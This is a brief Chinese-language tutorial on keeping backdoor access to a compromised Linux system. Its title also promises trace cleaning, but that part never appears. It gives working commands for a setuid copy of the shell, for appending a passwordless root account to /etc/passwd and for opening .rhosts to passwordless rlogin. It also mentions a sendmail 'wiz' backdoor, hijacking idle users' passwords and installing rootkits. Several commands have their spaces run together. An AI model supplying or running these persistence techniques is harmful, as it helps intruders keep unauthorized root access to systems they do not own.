linux系统从入侵留后门到痕迹清理详解

1.setuid

#cp/bin/sh/tmp/.sh

#chmodu+s/tmp/.sh

加上suid位到shell上，虽然很简单，但容易被发现
 
2.echo“hack::0:0::/:/bin/csh”>>/etc/passwd

即给系统增加一个id为0（root)的帐号，无口令。

但管理员很快就可以发现哦！
 
3.echo“++”>>/.rhosts

如果这个系统开了512,513的port呵呵，就可以

把一个名为hack加到.rhosts文件中，rlogin登陆，无要密码！
 
4.修改sendmail.cf文件增加一个”wiz”命令;

然后telnetwww.xxx.com25后，wiz。。。。ok
 
5.改已有用户密码
如果主机上有好多用户，当你看到一个用户好久没登入了，就可以改他的密码
#passwd可用passwd命令。
 
6.rootkit后门包
网上有好多地方下载，找找，自己试试看，我也在测试中！不会啊！！！！

*
*